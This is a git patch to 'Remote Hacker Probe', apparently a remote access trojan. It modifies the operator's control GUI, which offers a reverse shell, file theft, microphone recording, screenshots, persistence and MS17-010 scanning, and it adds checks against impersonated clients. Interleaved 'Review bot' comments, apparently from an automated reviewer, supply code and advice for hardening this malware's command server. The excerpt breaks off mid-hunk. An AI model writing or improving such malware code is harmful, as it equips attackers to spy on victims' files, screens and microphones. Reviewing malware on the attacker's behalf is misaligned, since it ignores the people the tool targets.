From d9b38737c8f2c9c0ffc11d9ff17e42fa17a5c0ea Mon Sep 17 00:00:00 2001 From: quantumcore Date: Sun, 7 Mar 2021 23:25:15 +0500 Subject: [PATCH] Fixed RCE Vuln --- gui/src/main/java/rhp/FileManager.java | 31 ++ gui/src/main/java/rhp/MainWindow.java | 22 +- gui/src/main/java/rhp/MicRecorder.java | 14 + gui/src/main/java/rhp/MsgBox.java | 11 + gui/src/main/java/rhp/NetworkScanner.java | 19 ++ gui/src/main/java/rhp/Persist.java | 10 + gui/src/main/java/rhp/Server.java | 1 + gui/src/main/java/rhp/Shell.java | 3 + gui/src/main/java/rhp/thread.java | 378 +++++++++++++++------- probe/windows/Probe.h | 7 +- probe/windows/ProbeCpp.cpp | 12 +- 11 files changed, 355 insertions(+), 153 deletions(-) diff --git a/gui/src/main/java/rhp/FileManager.java b/gui/src/main/java/rhp/FileManager.java index aa785af..317ee44 100644 --- a/gui/src/main/java/rhp/FileManager.java +++ b/gui/src/main/java/rhp/FileManager.java @@ -51,8 +51,11 @@ import javax.swing.JComboBox; + + class IconRenderer extends DefaultListCellRenderer { + String[] video_ext = { "mp4", "avi", @@ -253,14 +256,29 @@ else if(Arrays.asList(txt).contains(ext)) public class FileManager extends JDialog { + + public final static JPanel contentPanel = new JPanel(); static JList FileList; public int CLIENT_ID; + public static StringBuilder SelectedFile = new StringBuilder(""); public static JTextField textField; public static DefaultListModel model; public static List driveslist = new ArrayList(); + + public static Boolean FileMgrOpen = false; + + public static void DisableFileManager() + { + FileManager.FileList.setEnabled(false); + } + public static void EnableFileManager() + { + FileManager.FileList.setEnabled(true); + } + /** * Create the dialog. */ @@ -278,6 +296,8 @@ void Refresh() public FileManager() { + + MainWindow.HaltAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setTitle("Remote Hacker Probe | File Manager"); setBounds(100, 100, 761, 410); 
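Review bot: `SelectedFile` and `FileMgrOpen` in the second FileManager hunk are `public static`, so they describe the whole application rather than the client the operator is working with; the checks added in thread.java will therefore pass for any connected client while one File Manager is open. They also appear to be written from Swing listeners and read from the server thread with no synchronisation, and `StringBuilder` is not thread-safe. A `private static volatile String selectedFile` behind accessor methods, or a per-client map keyed by the socket, would make the expected-reply state visible across threads and specific to one client. `Boolean FileMgrOpen` can be a primitive `boolean`, since null is never a meaningful value here.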
@@ -318,6 +338,8 @@ public void actionPerformed(ActionEvent e) { String File = (String) FileList.getSelectedValue(); if(!File.startsWith("(^)")) { String filename = File.replaceAll("\\(.*?\\) ?", ""); + SelectedFile.replace(0, SelectedFile.length(), filename); + Server.SendData(Server.Clients.get(CLIENT_ID), "fupload:"+filename); ServerThread.WaitForReply(); } @@ -390,6 +412,7 @@ public void actionPerformed(ActionEvent e) { { String File = (String) FileList.getSelectedValue(); if(!File.startsWith("(^)")) { + SelectedFile.replace(0, SelectedFile.length(), File); String filename = File.replaceAll("\\(.*?\\) ?", ""); Server.SendData(Server.Clients.get(CLIENT_ID), "delete:"+filename); ServerThread.WaitForReply(); @@ -416,6 +439,7 @@ public void mouseClicked(MouseEvent evt) { String dir = (String) FileList.getSelectedValue(); if(dir.startsWith("(^)")) { String Dirname = dir.replace("(^) ", ""); + SelectedFile.replace(0, SelectedFile.length(), dir); Server.SendData(Server.Clients.get(CLIENT_ID), "cd"); Server.SendData(Server.Clients.get(CLIENT_ID), Dirname); Refresh(); @@ -438,6 +462,7 @@ public void actionPerformed(ActionEvent e) { btnGo.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { String Dirname = textField.getText(); + SelectedFile.replace(0, SelectedFile.length(), Dirname); Server.SendData(Server.Clients.get(CLIENT_ID), "cd"); Server.SendData(Server.Clients.get(CLIENT_ID), Dirname); Refresh(); @@ -505,6 +530,12 @@ public void actionPerformed(ActionEvent e) { public void windowOpened(WindowEvent we) { Server.SendData(Server.Clients.get(CLIENT_ID), "listdir"); } + + @Override + public void windowClosed(WindowEvent we) { + FileMgrOpen = false; + MainWindow.EnableAllSystems(); + } }); } } diff --git a/gui/src/main/java/rhp/MainWindow.java b/gui/src/main/java/rhp/MainWindow.java index 0de014b..e0eae51 100644 --- a/gui/src/main/java/rhp/MainWindow.java +++ b/gui/src/main/java/rhp/MainWindow.java 
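Review bot: The delete handler stores the raw list entry `File` in SelectedFile, while the command sent to the client uses the stripped `filename`, and the download handler above stores `filename`. thread.java compares the client's reply with `SelectedFile()`, so if list entries carry a parenthesised prefix, a legitimate delete reply would presumably fail the comparison and the client would be disconnected. Move the assignment below the `replaceAll` line and store the same value that is sent: `SelectedFile.replace(0, SelectedFile.length(), filename);`. The double-click handler has the same mismatch, storing `dir` with its `(^) ` prefix while sending `Dirname`.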
@@ -81,7 +81,7 @@ public boolean isCellEditable(int row, int column) { }; static JTextArea LogArea = new JTextArea(); public static JTable table; - public static JLabel onlinelabel; + public static JLabel onlinelabel = new JLabel(""); static JLabel userlbl = new JLabel("User : "); /** @@ -145,31 +145,16 @@ public static Double GetLongitude(int CLIENT_ID) public static void HaltAllSystems() { - if(FileManager.FileList != null){ - FileManager.FileList.setEnabled(false); // Disable The File Manager - } - if(Shell.ShellOutput != null); - { - Shell.ShellOutput.setEnabled(false); // Disable Shell - } - table.getSelectionModel().clearSelection(); + //table.getSelectionModel().clearSelection(); table.setEnabled(false); // Disable the Main Table too! } public static void EnableAllSystems() { - if(FileManager.FileList != null) - { - FileManager.FileList.setEnabled(true); // Enable The File Manager - } - - if(Shell.ShellOutput != null) - { - Shell.ShellOutput.setEnabled(true); // Enable Shell - } table.setEnabled(true); // Enable the Main Table too! } + public static void Log(String text) { String timeStamp = new SimpleDateFormat("HH:mm:ss").format(new Date()); @@ -479,6 +464,7 @@ public void actionPerformed(ActionEvent arg0) { Server.SendData(Server.Clients.get(index), "drives"); ServerThread.WaitForReply(); FileManager dialog = new FileManager(); + FileManager.FileMgrOpen = true; dialog.CLIENT_ID = table.getSelectedRow(); dialog.setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); dialog.setVisible(true); diff --git a/gui/src/main/java/rhp/MicRecorder.java b/gui/src/main/java/rhp/MicRecorder.java index fbf174a..8055734 100644 --- a/gui/src/main/java/rhp/MicRecorder.java +++ b/gui/src/main/java/rhp/MicRecorder.java 
@@ -15,6 +15,8 @@ import java.awt.event.ActionListener; import java.awt.event.ItemEvent; import java.awt.event.ItemListener; +import java.awt.event.WindowAdapter; +import java.awt.event.WindowEvent; import java.text.SimpleDateFormat; import java.util.Date; import java.util.concurrent.TimeUnit; @@ -29,6 +31,7 @@ public class MicRecorder extends JDialog { static JLabel lbl ; static JToggleButton jtb; public static int CLIENT_ID; + public static Boolean MicRec = false; /** * Launch the application. */ @@ -95,6 +98,8 @@ public void run() * Create the dialog. */ public MicRecorder() { + + MainWindow.HaltAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setResizable(false); setTitle("Remote Hacker Probe | Mic Recorder"); @@ -116,6 +121,7 @@ public MicRecorder() { jtb.addItemListener(new ItemListener() { public void itemStateChanged(ItemEvent ev) { + MicRec = true; if(ev.getStateChange()==ItemEvent.SELECTED){ Server.SendData(Server.Clients.get(CLIENT_ID), "micstart"); // send instruction to start mic recording // expect no reply @@ -142,6 +148,14 @@ public void itemStateChanged(ItemEvent ev) { contentPanel.add(jtb); + addWindowListener(new WindowAdapter() { + + @Override + public void windowClosed(WindowEvent we) { + MainWindow.EnableAllSystems(); + } + }); + } } diff --git a/gui/src/main/java/rhp/MsgBox.java b/gui/src/main/java/rhp/MsgBox.java index f987479..36591d4 100644 --- a/gui/src/main/java/rhp/MsgBox.java +++ b/gui/src/main/java/rhp/MsgBox.java @@ -12,6 +12,8 @@ import javax.swing.JTextField; import javax.swing.JComboBox; import java.awt.event.ActionListener; +import java.awt.event.WindowAdapter; +import java.awt.event.WindowEvent; import java.util.concurrent.TimeUnit; import java.awt.event.ActionEvent; import javax.swing.SwingConstants; 
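Review bot: `MicRec = true;` is the first statement of `itemStateChanged`, so it is set on deselect as well as select, and nothing in this patch sets it back to false. After the first toggle, the MIC_OK and MIC checks in thread.java stay satisfied for every client for the rest of the session, including after the dialog is closed. Set the flag inside the `ItemEvent.SELECTED` branch and clear it in the new `windowClosed` handler with `MicRec = false;`. A primitive `boolean` is enough for this field.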
@@ -28,6 +30,7 @@ public class MsgBox extends JDialog { * Create the dialog. */ public MsgBox() { + MainWindow.HaltAllSystems(); setResizable(false); setTitle("Remote Hacker Probe | Message Box"); setBounds(100, 100, 421, 217); @@ -98,5 +101,13 @@ public void actionPerformed(ActionEvent e) { btnNewButton.setFont(new Font("Calibri", Font.PLAIN, 12)); btnNewButton.setBounds(300, 147, 89, 23); contentPanel.add(btnNewButton); + + addWindowListener(new WindowAdapter() { + + @Override + public void windowClosed(WindowEvent we) { + MainWindow.EnableAllSystems(); + } + }); } } diff --git a/gui/src/main/java/rhp/NetworkScanner.java b/gui/src/main/java/rhp/NetworkScanner.java index fd90805..ec69b19 100644 --- a/gui/src/main/java/rhp/NetworkScanner.java +++ b/gui/src/main/java/rhp/NetworkScanner.java @@ -4,6 +4,8 @@ import java.awt.Font; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; +import java.awt.event.WindowAdapter; +import java.awt.event.WindowEvent; import java.io.File; import java.io.FileWriter; import java.io.IOException; @@ -53,6 +55,8 @@ public class NetworkScanner extends JDialog { JTabbedPane tabbedPane = new JTabbedPane(JTabbedPane.TOP); Boolean isActionRunning = false; + public static Boolean NetworkScanRunning = false; + /** * Create the dialog. * @return @@ -127,6 +131,7 @@ void ScanPort(String TargetIP) setDefaultCloseOperation(JDialog.DO_NOTHING_ON_CLOSE); MainWindow.HaltAllSystems(); isActionRunning = true; + NetworkScanRunning = true; progressBar_1.setIndeterminate(true); List lines; try { @@ -146,6 +151,7 @@ void ScanPort(String TargetIP) isActionRunning = false; MainWindow.EnableAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); + NetworkScanRunning = false; } void EScanIp(ArrayList localArray) 
@@ -153,6 +159,7 @@ void EScanIp(ArrayList localArray) setDefaultCloseOperation(JDialog.DO_NOTHING_ON_CLOSE); MainWindow.HaltAllSystems(); isActionRunning = true; + NetworkScanRunning = true; for (int counter = 0; counter < localArray.size(); counter++) { // System.out.println(localArray.get(counter)); @@ -170,6 +177,7 @@ void EScanIp(ArrayList localArray) EModel.addElement("MS17-010 Scan finished."); isActionRunning = false; + NetworkScanRunning = false; MainWindow.EnableAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); } @@ -179,6 +187,7 @@ void ScanIp(ArrayList localArray) setDefaultCloseOperation(JDialog.DO_NOTHING_ON_CLOSE); MainWindow.HaltAllSystems(); isActionRunning = true; + NetworkScanRunning = true; progressBar.setIndeterminate(true); for (int counter = 0; counter < localArray.size(); counter++) { // System.out.println(localArray.get(counter)); @@ -199,11 +208,13 @@ void ScanIp(ArrayList localArray) progressBar.setIndeterminate(false); NsModel.addElement("Scan finished."); isActionRunning = false; + NetworkScanRunning = false; MainWindow.EnableAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); } public NetworkScanner() { + MainWindow.HaltAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setResizable(false); @@ -641,6 +652,14 @@ public void actionPerformed(ActionEvent e) { MainWindow.addPopup(PList, jp2); MainWindow.addPopup(eternalscanoutput, jp3); MainWindow.addPopup(hsoutput, jp4); + + addWindowListener(new WindowAdapter() { + + @Override + public void windowClosed(WindowEvent we) { + MainWindow.EnableAllSystems(); + } + }); } } diff --git a/gui/src/main/java/rhp/Persist.java b/gui/src/main/java/rhp/Persist.java index 6067713..5ba7914 100644 --- a/gui/src/main/java/rhp/Persist.java +++ b/gui/src/main/java/rhp/Persist.java 
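Review bot: The `MainWindow.HaltAllSystems()` added to the NetworkScanner constructor is undone by the first scan, because ScanPort (previous hunks), EScanIp and ScanIp each end with `MainWindow.EnableAllSystems()`, re-enabling the main table while the dialog is still open. `NetworkScanRunning` is also reset only on the normal path, so if anything between the two assignments throws, the flag stays true and the scan-result checks in thread.java stay open. Wrapping each scan body in `try { ... } finally { NetworkScanRunning = false; isActionRunning = false; }` and leaving the re-enable to `windowClosed` would keep both states consistent. The method bodies extend beyond the hunks, so the exact placement needs checking against the full file.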
@@ -13,6 +13,8 @@ import java.awt.Font; import java.awt.event.ItemEvent; import java.awt.event.ItemListener; +import java.awt.event.WindowAdapter; +import java.awt.event.WindowEvent; import java.util.concurrent.TimeUnit; import javax.swing.JLabel; @@ -36,6 +38,7 @@ public class Persist extends JDialog { * Create the dialog. */ public Persist() { + MainWindow.HaltAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setTitle("Remote Hacker Probe | Persistence"); setResizable(false); @@ -224,5 +227,12 @@ public void actionPerformed(ActionEvent e) { keyname.setBounds(75, 165, 220, 26); contentPanel.add(keyname); keyname.setColumns(10); + addWindowListener(new WindowAdapter() { + + @Override + public void windowClosed(WindowEvent we) { + MainWindow.EnableAllSystems(); + } + }); } } diff --git a/gui/src/main/java/rhp/Server.java b/gui/src/main/java/rhp/Server.java index 5564db1..c77d2cd 100644 --- a/gui/src/main/java/rhp/Server.java +++ b/gui/src/main/java/rhp/Server.java @@ -159,6 +159,7 @@ public void run() { while(true) { try { clientsocket = mainsocket.accept(); + System.out.println("[INFO] New connection from : " + clientsocket.getRemoteSocketAddress().toString()); Clients.add(clientsocket); MainWindow.UpdateOnlineLabel(); getInformation(); diff --git a/gui/src/main/java/rhp/Shell.java b/gui/src/main/java/rhp/Shell.java index 61fae33..25705b4 100644 --- a/gui/src/main/java/rhp/Shell.java +++ b/gui/src/main/java/rhp/Shell.java @@ -37,6 +37,8 @@ public class Shell extends JDialog { JButton ShellGo; JLabel interact = new JLabel(""); public Shell() { + + MainWindow.HaltAllSystems(); setResizable(false); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setTitle("Remote Hacker Probe | Reverse Shell"); @@ -144,6 +146,7 @@ public void windowOpened(WindowEvent we) { public void windowClosed(WindowEvent e) { Shell.ShellOutput.setText(""); MainWindow.Log("Reverse Shell closed."); + MainWindow.EnableAllSystems(); } }); } 
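Review bot: The new connection message in Server.java goes to `System.out` only, so it never reaches the log area that the "Connection Closed" entries from thread.java are written to. Someone reviewing a kicked client therefore has no matching entry with the peer address. Using the existing logger keeps both events in one place: `MainWindow.Log("New connection from : " + clientsocket.getRemoteSocketAddress());`. The explicit `.toString()` is redundant in a string concatenation.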
diff --git a/gui/src/main/java/rhp/thread.java b/gui/src/main/java/rhp/thread.java index 3fcdbf7..b568969 100644 --- a/gui/src/main/java/rhp/thread.java +++ b/gui/src/main/java/rhp/thread.java @@ -64,6 +64,11 @@ public static void WaitForReplyMeta() // bruh } } + + public static String SelectedFile() + { + return FileManager.SelectedFile.toString().strip(); + } public static void WaitForReply() { LOG.clear(); @@ -156,8 +161,16 @@ public void run() { try { String[] parse = response.split(","); int mainIndex = Server.Clients.indexOf(sock); - JOptionPane.showMessageDialog(null, "File '"+parse[1] + "' deleted from '"+parse[2]+"'.", Server.UserPC.get(mainIndex) + " says : ", JOptionPane.INFORMATION_MESSAGE); - MainWindow.Log( "File '"+parse[1] + "' deleted from '"+parse[2]+"'."); + if(parse[1].equals(SelectedFile())) { + JOptionPane.showMessageDialog(null, "File '"+parse[1] + "' deleted from '"+parse[2]+"'.", Server.UserPC.get(mainIndex) + " says : ", JOptionPane.INFORMATION_MESSAGE); + MainWindow.Log( "File '"+parse[1] + "' deleted from '"+parse[2]+"'."); + } else { + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } + } catch (Exception e) { e.printStackTrace(); } 
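Review bot: In the new else branch of the delete reply, the log line calls `Server.Clients.indexOf(sock)` after `sock.close(); clear();`. clear() is defined outside the hunk, but if it removes the socket from Clients, the logged ID is -1. The same sequence is copied into the later [HOST], [HOSTERR], OPENPORT, !MS17!, DIRERROR, !hs!, SCREENSHOT, MIC_OK and MIC hunks, and the [HOST], SCREENSHOT, MIC_OK and MIC copies then pass that index to `Server.UserPC.get(mainIndex)`, which would throw before the dialog is shown. Resolving the index first and moving the sequence into one helper fixes the order and removes the duplication. The helper below assumes `sock` is a `java.net.Socket` and that `IOException` is in scope; the enclosing run() body starts and ends outside the hunk.

```java
// Disconnects a client that sent a reply the GUI did not ask for.
private void kickClient(Socket sock, String reason) throws IOException {
    int clientId = Server.Clients.indexOf(sock); // resolve before clear() drops the entry
    MainWindow.Log("Connection Closed for Client ID : " + clientId + " (" + reason + ")");
    Server.SendData(sock, "kill");
    sock.close();
    clear();
}
```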
@@ -169,33 +182,50 @@ else if(response.startsWith("FILE")) { String fileinfo[] = response.split(":"); String filename = fileinfo[1].strip(); String filesizeStr = fileinfo[2].strip(); - int fsize = Integer.parseInt(filesizeStr); - JOptionPane.showMessageDialog(null, "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - MainWindow.Log( "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - File downloaded_file = new File(filename); - downloaded_file.createNewFile(); - FileOutputStream fos = new FileOutputStream(downloaded_file, false); - BufferedOutputStream out = new BufferedOutputStream(fos); - - MainWindow.HaltAllSystems(); - byte[] filebuf = new byte[fsize]; - Arrays.fill(filebuf, (byte)0); - do { - read= is.readNBytes(filebuf, 0, fsize); - fos.write(filebuf, 0, read); - if(read == Integer.parseInt(filesizeStr)) { - break; - } - //System.out.println(read); - } while (read != 0); - - MainWindow.EnableAllSystems(); - fos.close(); - JOptionPane.showMessageDialog(null, "File " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" - + "Bytes Recevied : " + String.valueOf( new File(filename).length()) + " Bytes."); - MainWindow.Log("File " + filename + " downloaded."); - - out.flush(); + + if(filename.equals(SelectedFile())) { + + int fsize = Integer.parseInt(filesizeStr); + JOptionPane.showMessageDialog(null, "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); + MainWindow.Log( "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); + File downloaded_file = new File("downloads/" + filename); + downloaded_file.createNewFile(); + FileOutputStream fos = new FileOutputStream(downloaded_file, false); + BufferedOutputStream out = new BufferedOutputStream(fos); + + FileManager.DisableFileManager(); + byte[] filebuf = new byte[fsize]; + Arrays.fill(filebuf, (byte)0); + do { + read= is.readNBytes(filebuf, 0, fsize); + 
fos.write(filebuf, 0, read); + if(read == Integer.parseInt(filesizeStr)) { + break; + } + //System.out.println(read); + } while (read != 0); + + FileManager.EnableFileManager(); + fos.close(); + JOptionPane.showMessageDialog(null, "File " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" + + "Bytes Recevied : " + String.valueOf( new File("downloads/"+filename).length()) + " Bytes."); + MainWindow.Log("File " + filename + " downloaded."); + + out.flush(); + } else { + // The file being downloaded is not the same as the file selected + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + Server.SendData(sock, "kill"); + sock.close(); + clear(); + + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it attempted to upload a file we did not Download. There may be a third party Impersonating as the Probe."); + + + + } } else if (response.startsWith("F_OK")) { 
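Review bot: The equality check against `SelectedFile()` does not confine the write to `downloads/`, because the selected name appears to originate from the client's own directory listing and is concatenated into `new File("downloads/" + filename)` unchanged. The target should be resolved and normalised, then rejected unless it still lies under the downloads directory. `fsize` is parsed from the same header and passed straight to `new byte[fsize]`, so a negative or very large value ends in an exception or an out-of-memory error; it needs a bound (the `MAX_DOWNLOAD_BYTES` limit below is a name the project would have to define). `fos` is closed only on the success path and `out` is never written to, so try-with-resources on the one stream is enough. The enclosing handler starts outside the hunk, so how the rejection should surface there is for the author to decide.

```java
if(filename.equals(SelectedFile())) {
    // Resolve under downloads/ and refuse names that normalise to a path outside it.
    Path downloadsDir = new File("downloads").toPath().toAbsolutePath().normalize();
    Path target = downloadsDir.resolve(filename).normalize();
    int fsize = Integer.parseInt(filesizeStr);
    if (!target.startsWith(downloadsDir) || fsize < 0 || fsize > MAX_DOWNLOAD_BYTES) {
        throw new IllegalStateException("Rejected FILE header from client");
    }
    // … unchanged: dialog and log announcing the download …
    try (FileOutputStream fos = new FileOutputStream(target.toFile(), false)) {
        // … unchanged: readNBytes loop writing filebuf to fos …
    }
    // … unchanged: completion dialog and log …
```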
@@ -235,12 +265,25 @@ else if(response.startsWith("[HOST]")) { try { //System.out.println("Got the damn response!"); - String parse[] = response.split(","); - String IpAddr = parse[1]; - String hostname = parse[2]; - String Macaddr = parse[3]; + if(NetworkScanner.NetworkScanRunning) + { + String parse[] = response.split(","); + String IpAddr = parse[1]; + String hostname = parse[2]; + String Macaddr = parse[3]; + + NetworkScanner.NsModel.addElement("Discovered host : " + IpAddr + " - " + hostname + " - " + Macaddr ); + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it sent an unexpected command. There may be a third party Impersonating as the Probe."); + } - NetworkScanner.NsModel.addElement("Discovered host : " + IpAddr + " - " + hostname + " - " + Macaddr ); } catch (Exception ls) { ls.printStackTrace(); // TODO : what the fuck am I naming the exception. @@ -249,9 +292,18 @@ else if(response.startsWith("[HOST]")) else if (response.startsWith("[HOSTERR]")) { try { - //System.out.println("Got the damn ERROR response!"); - String parse[] = response.split("-"); - NetworkScanner.NsModel.addElement( parse[1]); + if(NetworkScanner.NetworkScanRunning) + { + //System.out.println("Got the damn ERROR response!"); + String parse[] = response.split("-"); + NetworkScanner.NsModel.addElement( parse[1]); + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } } catch (Exception ls) { 
@@ -262,9 +314,18 @@ else if (response.startsWith("[HOSTERR]")) { else if(response.startsWith("OPENPORT")) { try { - String parse[] = response.split(":")[1].split(","); + if(NetworkScanner.NetworkScanRunning) + { + String parse[] = response.split(":")[1].split(","); - NetworkScanner.PModel.addElement( "Port is open " + parse[1] + " (" + NetworkScanner.PortService(parse[1]) + ") on " + parse[0]); + NetworkScanner.PModel.addElement( "Port is open " + parse[1] + " (" + NetworkScanner.PortService(parse[1]) + ") on " + parse[0]); + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } } catch (Exception ls) { @@ -274,12 +335,22 @@ else if(response.startsWith("OPENPORT")) else if(response.startsWith("!MS17!")){ try { - String[] infoString = response.split("!MS17!"); - - for (String info : infoString) { - NetworkScanner.EModel.addElement(info); + if(NetworkScanner.NetworkScanRunning) + { + String[] infoString = response.split("!MS17!"); + + for (String info : infoString) { + NetworkScanner.EModel.addElement(info); + } + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); } + } catch (Exception ls) { ls.printStackTrace(); // TODO : what the fuck am I naming the exception. 
@@ -289,11 +360,21 @@ else if(response.startsWith("!MS17!")){ else if(response.startsWith("DIRERROR")) { try { - String infoString = response.replace("DIRERROR", ""); + if(FileManager.FileMgrOpen) + { + String infoString = response.replace("DIRERROR", ""); + + int mainIndex = Server.Clients.indexOf(sock); + JOptionPane.showMessageDialog(null, infoString, Server.UserPC.get(mainIndex) + " says : ", JOptionPane.INFORMATION_MESSAGE); + MainWindow.Log(Server.UserPC.get(mainIndex) + " says : " + infoString); + } else { + // File manager isn't open + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } - int mainIndex = Server.Clients.indexOf(sock); - JOptionPane.showMessageDialog(null, infoString, Server.UserPC.get(mainIndex) + " says : ", JOptionPane.INFORMATION_MESSAGE); - MainWindow.Log(Server.UserPC.get(mainIndex) + " says : " + infoString); } catch (Exception ls) { @@ -316,9 +397,19 @@ else if(response.startsWith("F_ERR")) } else if(response.startsWith("!hs!")){ try { - String infoString = response.replace("!hs!", ""); + if(NetworkScanner.NetworkScanRunning) + { + String infoString = response.replace("!hs!", ""); + + NetworkScanner.HModel.addElement(infoString); + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } - NetworkScanner.HModel.addElement(infoString); } catch (Exception ls) { 
@@ -331,91 +422,128 @@ else if(response.startsWith("SCREENSHOT")) { String filename = fileinfo[1].strip(); String filesizeStr = fileinfo[2].strip(); int fsize = Integer.parseInt(filesizeStr); + if(filename.contains(".bmp")) { //JOptionPane.showMessageDialog(null, "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - MainWindow.Log( "Screenshot '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - File downloaded_file = new File(filename); - downloaded_file.createNewFile(); - FileOutputStream fos = new FileOutputStream(downloaded_file, false); - BufferedOutputStream out = new BufferedOutputStream(fos); - - MainWindow.HaltAllSystems(); - byte[] filebuf = new byte[fsize]; - Arrays.fill(filebuf, (byte)0); - do { - read= is.readNBytes(filebuf, 0, fsize); - fos.write(filebuf, 0, read); - if(read == Integer.parseInt(filesizeStr)) { - break; - } - //System.out.println(read); - } while (read != 0); - - fos.close(); - // Convert bmp to png - String newfile = filename.replace(".bmp", ".png"); - BufferedImage bmpimg = ImageIO.read(downloaded_file); - File outputfile = new File("screenshots/"+newfile); // - ImageIO.write(bmpimg, "png", outputfile); - // Delete original - try { - Path delete = new File(filename).toPath(); Files.deleteIfExists(delete); - } catch (Exception eS) - { - eS.printStackTrace(); - } - - - // Display Image - ImageViewer.ImagePath = "screenshots/" + newfile; - ImageViewer iv = new ImageViewer(); iv.setVisible(true); - - MainWindow.EnableAllSystems(); - - //JOptionPane.showMessageDialog(null, "File " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" - // + "Bytes Recevied : " + String.valueOf( new File(filename).length()) + " Bytes."); - MainWindow.Log("Screenshot " + filename + " downloaded."); - - out.flush(); - } + MainWindow.Log( "Screenshot '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); + File downloaded_file = new File(filename); + 
downloaded_file.createNewFile(); + FileOutputStream fos = new FileOutputStream(downloaded_file, false); + BufferedOutputStream out = new BufferedOutputStream(fos); + + MainWindow.HaltAllSystems(); + byte[] filebuf = new byte[fsize]; + Arrays.fill(filebuf, (byte)0); + do { + read= is.readNBytes(filebuf, 0, fsize); + fos.write(filebuf, 0, read); + if(read == Integer.parseInt(filesizeStr)) { + break; + } + //System.out.println(read); + } while (read != 0); + + fos.close(); + // Convert bmp to png + String newfile = filename.replace(".bmp", ".png"); + BufferedImage bmpimg = ImageIO.read(downloaded_file); + File outputfile = new File("screenshots/"+newfile); // + ImageIO.write(bmpimg, "png", outputfile); + // Delete original + try { + Path delete = new File(filename).toPath(); Files.deleteIfExists(delete); + } catch (Exception eS) + { + eS.printStackTrace(); + } + + + // Display Image + ImageViewer.ImagePath = "screenshots/" + newfile; + ImageViewer iv = new ImageViewer(); iv.setVisible(true); + + MainWindow.EnableAllSystems(); + + //JOptionPane.showMessageDialog(null, "File " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" + // + "Bytes Recevied : " + String.valueOf( new File(filename).length()) + " Bytes."); + MainWindow.Log("Screenshot " + filename + " downloaded."); + + out.flush(); + } else { + + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it attempted to upload a file we did not Download. 
There may be a third party Impersonating as the Probe."); + } + } else if(response.startsWith("MIC_OK")) { - String Message = response.replace("MIC_OK:",""); - MainWindow.Log("Client ID " + String.valueOf(Server.Clients.indexOf(sock)) + " says : " + Message); - MicRecorder.AnimateGui(); + if(MicRecorder.MicRec) + { + String Message = response.replace("MIC_OK:",""); + MainWindow.Log("Client ID " + String.valueOf(Server.Clients.indexOf(sock)) + " says : " + Message); + MicRecorder.AnimateGui(); + } else { + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it attempted to upload a file we did not Download. There may be a third party Impersonating as the Probe."); + } + } else if(response.startsWith("MIC")) { - String fileinfo[] = response.split(":"); - String filename = fileinfo[1].strip(); - String filesizeStr = fileinfo[2].strip(); - int fsize = Integer.parseInt(filesizeStr); - - MainWindow.Log( "Mic Recording '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - File downloaded_file = new File(filename); - downloaded_file.createNewFile(); - FileOutputStream fos = new FileOutputStream(downloaded_file, false); - BufferedOutputStream out = new BufferedOutputStream(fos); - - 